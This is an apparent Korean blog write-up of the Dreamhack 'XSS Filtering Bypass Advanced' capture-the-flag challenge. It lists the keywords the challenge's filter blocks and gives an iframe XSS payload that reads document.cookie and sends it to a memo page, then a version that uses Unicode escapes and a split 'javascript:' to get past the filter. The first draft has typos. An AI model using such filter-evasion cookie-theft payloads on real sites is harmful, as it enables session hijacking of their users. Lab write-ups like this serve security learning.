[Dreamhack] XSS Filtering Bypass Advanced 문제

 

​

xss_filter에서 script, on, javascript, window, self, this, document, location, (, ), $# 를 필터를 하고 있습니다.

​

<iframe src=”javascript”document.lcation.herf=’/memo?memo=’+document.cookie;/>

​

코드하나를 작성해 왔는데 지금 상태로는 xss_filter에서 막힐 것입니다. 그래서 유니코드로 변환하여 우회를 할 것입니다.

​

 

<iframe src="javascr ipt:\u0064ocument.locati\u006f\u006e.href = '/memo?memo=' + \u0064ocument.cookie;"/>

​

​

필터링 되는 부분을 중점을 둬서 유티코드로 바꿔졌습니다. 이제 이 코드를 flag에 삽입을 해주게 된다면

​

flag 값이 출력이 됐습니다.